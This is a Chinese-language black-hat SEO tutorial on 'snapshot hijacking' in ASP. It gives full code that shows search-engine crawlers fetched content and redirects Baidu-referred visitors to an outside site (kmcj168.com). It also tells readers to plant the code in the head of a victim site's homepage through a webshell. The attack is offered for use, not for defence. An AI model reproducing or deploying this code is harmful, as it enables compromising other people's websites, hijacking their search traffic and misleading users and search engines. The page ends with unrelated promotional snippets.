一起学习网,一个一起免费的网络建站教程资源共享和seo教程、黑帽教程学习交流的学习网站,www.17xuexiwang.com,一起学习,共同进步!

ASP快照劫持方法,如何快照劫持

时间:2017-09-23 20:43   文章来源:一起学习网   访问次数:

  今天讲第一课,asp劫持,我们看下这个网站,他的网址是这个,但是我们一打开,他的网址跳转了。已经被劫持了,如果你直接打开的话,是自己的内容,通过百度打开他会跳转,这就是快照劫持。只要对方网站更新了,那么关键字就是你的网站关键字了,通过百度打开会进入你的网站。

  我们看一下劫持代码是怎么实现劫持的?
 

01 <%
02 function GetBot()
03 '查询蜘蛛
04 dim s_agent
05 GetBot=""
06 s_agent=Request.ServerVariables("HTTP_USER_AGENT") '关键判断语句
07 if instr(1,s_agent,"googlebot",1) >0 then
08 GetBot="google"
09 end if
10 if instr(1,s_agent,"msnbot",1) >0 then
11 GetBot="MSN"
12 end if
13 if instr(1,s_agent,"slurp",1) >0 then
14 GetBot="Yahoo"
15 end if
16 if instr(1,s_agent,"baiduspider",1) >0 then
17 GetBot="baidu"
18 end if
19 if instr(1,s_agent,"sohu-search",1) >0 then
20 GetBot="Sohu"
21 end if
22 if instr(1,s_agent,"lycos",1) >0 then
23 GetBot="Lycos"
24 end if
25 if instr(1,s_agent,"robozilla",1) >0 then
26 GetBot="Robozilla"
27 end if
28 end function
29 Function getHTTPPage(Path)
30 t = GetBody(Path)
31 getHTTPPage=BytesToBstr(t,"GB2312")'编码
32 End function
33 Function Newstring(wstr,strng)
34 Newstring=Instr(lcase(wstr),lcase(strng))
35 if Newstring<=0 then Newstring=Len(wstr)
36 End Function
37 Function GetBody(url)
38 on error resume next
39 Set Retrieval = CreateObject("Microsoft.XMLHTTP")
40 With Retrieval
41 .Open "Get", url, False, "", ""
42 .Send
43 GetBody = .ResponseBody
44 End With
45 Set Retrieval = Nothing
46 End Function
47 Function BytesToBstr(body,Cset)
48 dim objstream
49 set objstream = Server.CreateObject("adodb.stream")
50 objstream.Type = 1
51 objstream.Mode =3
52 objstream.Open
53 objstream.Write body
54 objstream.Position = 0
55 objstream.Type = 2
56 objstream.Charset = Cset
57 BytesToBstr = objstream.ReadText
58 objstream.Close
59 set objstream = nothing
60 End Function
61 Dim wstr,str,url,start,over,dtime
62 if GetBot="baidu" then
64 wstr=getHTTPPage(url)
65 body=wstr
66 response.write ""&body&""
67 response.end
68 elseif GetBot="google" then
70 wstr=getHTTPPage(url)
71 body=wstr
72 response.write ""&body&""
73 response.end
74 end if
75 if instr(Request.ServerVariables("http_referer"),"www.baidu.com")>0 then
76 response.redirect("http://www.kmcj168.com/")
77 end if
78 %>

  先做关键词判断,谷歌百度雅虎等等,也可以自己添加360的或者搜狗的都可以。这边最关键,这边是提供快照,提供百度谷歌的快照抓取页面,这边就是跳转,我们拿一个站演示一下,我们就找这个站演示,我们现在去劫持这个站,我们首先进入webshell,webshell值得是网站控制权,指的是控制别人的网站,是你拿来要挂黑链的网站,这个sebshell会在后面一节的时候会讲,我们先对这个做下劫持。我们进去根目录,找到index,这个就是主页,我们编辑,找到head,找到网站头部,找到对方的关键字信息,把代码放到head,拉到底部保持,现在再来看下这个网站,我们点击,跳转了。然后我们直接打开,直接打开是他的内容,通过百度是跳转到我们的页面的。我们更新一下快照,这个网站的关键字就是我们的了,就是我们刚才设置的关键字了。

asp劫持代码

  这个代码主要修改三部分,一个是快照抓取的,修改成你的网站,关键字就是会抓取你的网站的关键字和描述,还有就是跳转。记得代码是放到头部head顶部,修改一下快照网址。

上一篇:渗透技术攻防高手
下一篇:php快照劫持和php快照劫持源码

标签:

今日话题更多>

  • 武汉大学信息门户是什么 武汉大学信息门户是什么 武汉大学信息门户是武汉大学官方网站的入口,它为武汉大学师生员工提供信息服务和网络应用入口。信息门户网址为:ehall.whu.edu.cn。 信息门户包含以下主要功能: 1. 统一身份……
  • 壹米滴答物流单号查询方法 壹米滴答物流单号查询方法 壹米滴答物流单号查询可通过以下方式进行: 1. 登录壹米滴答官网 登录www.yimidida.com网址,点击页面右上角的登录按钮,输入用户名和密码进行登录。登录成功后,在用户中心可……
  • 壹米滴答物流是什么平台 壹米滴答物流是什么平台 壹米滴答是一家中国国际物流快递公司,提供国内外物流配送服务。 1. 公司简介 壹米滴答成立于2013年,由深圳市壹米滴答供应链管理有限公司运营。现已开通200多个国家和地区的……

黑帽学习 更多 >>